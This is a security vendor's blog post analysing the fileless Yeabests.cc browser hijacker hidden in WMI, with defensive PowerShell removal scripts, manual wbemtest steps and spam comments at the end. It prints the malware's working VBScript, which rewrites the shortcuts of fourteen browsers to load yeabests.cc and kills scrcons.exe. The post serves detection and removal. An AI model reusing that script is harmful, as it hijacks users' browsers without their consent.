Sunday, April 24, 2016

Yeabests.cc Fileless Browser Hijacker



Recently, we discovered a browser hijacker that alters browser shortcuts by inserting http://yeabests.cc as a command-line argument. When you open your browser, instead of your favorite search engine you are presented with this page:


This is nothing new when it comes to browser hijacking; I would say it is a well-known trick. What fascinated me was how this malware works and the idea they came up with to stay undetected: it alters your shortcuts over and over again, after every cleaning.

This so-called fileless malware lives inside WMI (Windows Management Instrumentation), or more precisely as a VBScript stored in an instance of the ActiveScriptEventConsumer class.

The script is executed by the WMI Standard Event Consumer scripting application, scrcons.exe, which can be found in the WMI folder at %system32%\wbem\scrcons.exe. This makes the script hard to detect, since it runs under the not-so-common WMI script host scrcons.exe rather than the familiar Windows Script Host, wscript.exe.

The script can be inspected with the Windows built-in application wbemtest.exe or with WMI Explorer.
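The same inspection can be scripted. The following is an added example, not code from the original post or from Zemana: it lists every ActiveScriptEventConsumer in root\subscription, shows the __EventFilter query that triggers it, dumps the script text, and flags consumers matching a small indicator list (the indicator strings and the $remove switch are my assumptions).

```powershell
# Added example, not code from the original post: triage (and optionally remove) WMI
# permanent event subscriptions in root\subscription whose script consumer references
# the hijack URL. Run from an elevated Windows PowerShell prompt; set $remove = $true
# only after reading the dumped script. The indicator strings are an assumption.
$indicators = 'yeabests.cc', 'CreateShortcut', 'taskkill'
$remove     = $false
$ns         = 'root\subscription'

$consumers = Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer
$filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
$bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding

foreach ($c in $consumers) {
    $hits = $indicators | Where-Object { $c.ScriptText -match [regex]::Escape($_) }
    $tag  = if ($hits) { "SUSPICIOUS: $($hits -join ', ')" } else { 'review' }
    Write-Host "[$tag] consumer '$($c.Name)' engine=$($c.ScriptingEngine)"

    # A consumer only runs when a __FilterToConsumerBinding ties it to a __EventFilter,
    # whose WQL query is the trigger (for example a timer or a process-start event).
    $bound = $bindings | Where-Object { $_.Consumer -like "*ActiveScriptEventConsumer.Name=`"$($c.Name)`"*" }
    foreach ($b in $bound) {
        $fname = ($b.Filter -split '"')[1]
        $f = $filters | Where-Object { $_.Name -eq $fname }
        Write-Host "    trigger ($fname): $($f.Query)"
        if ($remove -and $hits) {
            # Delete the binding first; it holds references to the filter and the consumer.
            $b | Remove-WmiObject
            $f | Remove-WmiObject
        }
    }
    # Dump the script the way wbemtest shows it, so the analyst sees exactly what it does.
    Write-Host ($c.ScriptText -replace '(?m)^', '    | ')
    if ($remove -and $hits) { $c | Remove-WmiObject; Write-Host "    removed consumer '$($c.Name)'" }
}
```

Any consumer tagged "review" is not necessarily malicious; legitimate software also registers WMI subscriptions, so read the script text before removing anything.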


Below is the content of the VBScript used to hijack browsers:
Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = "http://yeabests.cc"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
 BrowserDic.Add LCase(browser), browser
Next
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\Rafael\Desktop"
FoldersDic(5) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\Rafael\AppData\Roaming"
FoldersDic(9) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
 For Each file In fso.GetFolder(FoldersDic(i)).Files
  If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
   set oShellLink = WshShell.CreateShortcut(file.Path)
   path = oShellLink.TargetPath
   name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
   If BrowserDic.Exists(LCase(name)) Then
    oShellLink.Arguments = link
    If file.Attributes And 1 Then
     file.Attributes = file.Attributes - 1
    End If
    oShellLink.Save
   End If
  End If
 Next
Next
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

As you can see, the malware can hijack 14 different browsers by matching the shortcut target's executable name against this list:

 IEXPLORE.EXE
 chrome.exe
 firefox.exe
 360chrome.exe
 360SE.exe
 SogouExplorer.exe
 opera.exe
 Safari.exe
 Maxthon.exe
 TTraveler.exe
 TheWorld.exe
 baidubrowser.exe
 liebao.exe
 QQBrowser.exe

Zemana AntiMalware removes this malware and cleans altered shortcuts.



Manual removal

Manual removal of this malware isn't hard at all.
  • Press the Windows key + R at the same time. Type wbemtest and click OK.

  • The Windows Management Instrumentation Tester window will open. Click Connect.

  • Type root\subscription as the namespace, exactly as shown in the image below:


  • Click Open Class in the next window and type ActiveScriptEventConsumer.
  • Now click Instances.

  • And then, to finally remove this malware, delete that instance:
The only thing left is to remove the argument from your browser shortcuts.
  • Right-click the affected shortcut and select Properties.
  • Remove the http://yeabests.cc argument after "
  • Click OK to apply changes.
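Doing this by hand for every shortcut is tedious, so here is an added example (not code from the original post or from Zemana) that mirrors the hijacker's own folder list and browser list but strips the argument instead of adding it. It resolves the per-user folders through environment variables rather than the hard-coded "Rafael" profile, and clears the read-only attribute the same way the hijacker does, since CreateShortcut().Save fails on a read-only .lnk; run it as the affected user.

```powershell
# Added example, not code from the original post: undo the shortcut tampering for the
# current user. The browser list and URL are the ones quoted in the post; the folder
# list is the hijacker's, with per-user paths resolved via environment variables.
$hijackUrl = 'http://yeabests.cc'
$browsers  = 'iexplore.exe','chrome.exe','firefox.exe','360chrome.exe','360se.exe',
             'sogouexplorer.exe','opera.exe','safari.exe','maxthon.exe','ttraveler.exe',
             'theworld.exe','baidubrowser.exe','liebao.exe','qqbrowser.exe'
$startMenu = 'Microsoft\Windows\Start Menu'
$quick     = "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch"
$folders   = @("$env:PUBLIC\Desktop", "$env:USERPROFILE\Desktop", $env:APPDATA, $quick,
               "$quick\User Pinned\StartMenu", "$quick\User Pinned\TaskBar") +
             @('', '\Programs', '\Programs\Startup' | ForEach-Object {
                 "$env:ProgramData\${startMenu}$_"; "$env:APPDATA\${startMenu}$_" })

$shell   = New-Object -ComObject WScript.Shell
$cleaned = 0
foreach ($lnk in Get-ChildItem -Path $folders -Filter *.lnk -ErrorAction SilentlyContinue) {
    $sc = $shell.CreateShortcut($lnk.FullName)
    # Match on the target's file name, exactly as the hijacker's BrowserDic lookup does.
    $target = [IO.Path]::GetFileName($sc.TargetPath).ToLower()
    if ($browsers -contains $target -and $sc.Arguments -like "*$hijackUrl*") {
        $sc.Arguments = ($sc.Arguments -replace [regex]::Escape($hijackUrl), '').Trim()
        if ($lnk.IsReadOnly) { $lnk.IsReadOnly = $false }  # Save needs the read-only bit clear
        $sc.Save()
        Write-Host "Cleaned $($lnk.FullName)"
        $cleaned++
    }
}
Write-Host "$cleaned shortcut(s) cleaned"
```

Remove the WMI subscription first; otherwise the next trigger of the event consumer simply re-adds the argument.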

Save yourself the hassle and install Zemana AntiMalware.


Additional Information:

Md5: a718bf376567abd3e7de06f31b036405
VirusTotal: Yeabests installer


3 comments:

  1. You just saved my day! Thanks!

  2. Trojan steed contaminations have dependably been a danger that made repulsiveness among web clients and this is for the most part since they were made for the fundamental reason for permitting outsiders and programmers access to any framework and thus may turn out to be more destructive than infection programs. my review here

  3. A particular element of the thieves is that they take the client's program under full control, and don't leave him a shot. The program changes the settings of the program, the default internet searcher and uncovered its own landing page. https://how-to-remove.org/malware/browser-hijacker-removal/gotowebs-com-removal/
